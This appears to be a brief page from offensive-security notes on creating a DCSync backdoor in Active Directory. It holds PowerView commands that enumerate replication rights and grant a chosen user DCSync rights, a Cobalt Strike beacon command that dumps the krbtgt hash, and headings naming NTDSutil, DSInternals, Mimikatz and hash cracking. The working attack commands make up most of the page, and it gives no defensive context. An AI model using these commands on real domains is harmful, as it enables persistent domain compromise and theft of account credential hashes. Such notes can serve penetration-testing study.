DCSync Backdoor

# Enumerate
Get-DomainObjectAcl -ResolveGUIDs | where {$_.ObjectDN -eq "DC=Marvel,DC=local" -and $_.ObjectAceType -match "DS-Replication"} | select ActiveDirectoryRights,ObjectAceType,SecurityIdentifier
# Command
Add-DomainObjectAcl -TargetIdentity "DC=marvel,DC=local" -PrincipalIdentity user4 -Rights DCSync
beacon> dcsync dev.cyberbotic.io DEV\krbtgtNTDS Dump
NTDSutil

Then use the DSInternals script to extract all the hashed from this dump.

Mimikatz

Invoke DCSync
Cracking

Last updated